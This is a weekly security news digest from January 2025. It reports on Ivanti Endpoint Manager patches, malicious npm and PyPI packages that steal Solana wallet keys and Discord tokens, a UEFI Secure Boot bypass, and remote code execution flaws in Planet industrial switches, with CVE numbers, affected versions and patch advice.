Rose debug info
---------------

Programmer’s Digest #118

01/15/2025-01/22/2025 Ivanti Patches Critical Vulnerabilities, Malicious npm Packages Stealling Solana Wallet Keys, New UEFI Secure Boot Flaw And More.

1. Ivanti Patches Critical Vulnerabilities in Endpoint Manager

Ivanti announced patches for critical and high-severity vulnerabilities in Avalanche, Application Control Engine, and Endpoint Manager (EPM). The most severe issues are four absolute path traversal bugs in EPM (CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, CVE-2024-13159) with a CVSS score of 9.8. These impact EPM 2024 and 2022 SU6 (with November 2024 updates) and could leak sensitive data remotely without authentication. January 2025 updates also address 12 high-severity flaws, including remote code execution (RCE), denial-of-service (DoS), and privilege escalation.

Avalanche 6.4.7 resolves three high-severity path traversal vulnerabilities (CVE-2024-13181, CVE-2024-13180, CVE-2024-13179) that could bypass authentication and leak data. Two also fix incomplete October 2024 patches. Application Control Engine updates (versions 2024.3 HF1, 2024.1 HF4, 2023.3 HF3) address a high-severity race condition flaw requiring authentication to exploit. No fixes will be provided for older modules.

2. Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTP

Cybersecurity researchers have identified malicious npm and PyPI packages capable of stealing and deleting sensitive data. Notable packages include:

  • npm: @async-mutex/mutex, dexscreener, solana-transaction-toolkit, solana-stable-web-huks, cschokidar-next, achokidar-next, achalk-next, csbchalk-next, cschalk.
  • PyPI: pycord-self.

The first four npm packages intercept Solana private keys, using Gmail’s SMTP servers to exfiltrate data, and can drain up to 98% of wallet contents. GitHub repositories promoting these packages, linked to accounts like “moonshot-wif-hwan”, have been taken down. Other npm packages feature a “kill switch” to wipe project files and exfiltrate environment variables. For instance, csbchalk-next activates deletion only upon receiving a specific server response.

PyPI package pycord-self targets Python developers by capturing Discord tokens and establishing persistent backdoor access.

Additionally, attackers target Roblox users via fake libraries leveraging open-source stealer malware. Developers are advised to exercise caution and verify package authenticity.

3. New UEFI Secure Boot Flaw Exposes Systems to Bootkits

A new UEFI Secure Boot bypass vulnerability, CVE-2024-7344, impacts a Microsoft-signed application and can deploy bootkits even with Secure Boot enabled. Bootkits are hard to detect, as they load before the OS and persist after re-installs.

The vulnerability arises from a custom PE loader in certain UEFI recovery tools, bypassing Secure Boot validation. The affected application uses insecure methods to decrypt and execute binaries, allowing attackers to replace the default bootloader with a vulnerable one and deploy a malicious payload.

Impacted products include:

  • Howyar SysReturn <10.2.023_20240919
  • Greenware GreenGuard <10.2.023-20240927
  • Radix SmartRecovery <11.2.023-20240927
  • Others listed by ESET.

Microsoft patched the issue on January 14, 2025, revoking certificates for affected UEFI apps. Users should install the latest updates to mitigate risks. ESET provided PowerShell commands to verify certificate revocations and demonstrated the exploit in a video.

4. Critical Flaws in WGS-804HPT Switches Enable RCE and Network Exploitation

Researchers have uncovered three vulnerabilities in Planet Technology’s WGS-804HPT industrial switches that could enable pre-authentication remote code execution. These switches are widely used in building and home automation networks, making them a critical target for attackers.

Claroty’s analysis revealed the flaws in the dispatcher.cgi interface, which powers the switches’ web service:

  • CVE-2024-52558 (CVSS 5.3): An integer underflow flaw causing a crash via malformed HTTP requests.
  • CVE-2024-52320 (CVSS 9.8): An OS command injection flaw enabling remote code execution.
  • CVE-2024-48871 (CVSS 9.8): A stack-based buffer overflow leading to remote code execution.

Exploiting these flaws allows attackers to embed shellcode in HTTP requests, hijack execution flow, and execute OS commands.

Planet Technology patched the issues with firmware version 1.305b241111, released on November 15, 2024. Users are urged to update immediately to mitigate the risk.

17 d   digest   programmers'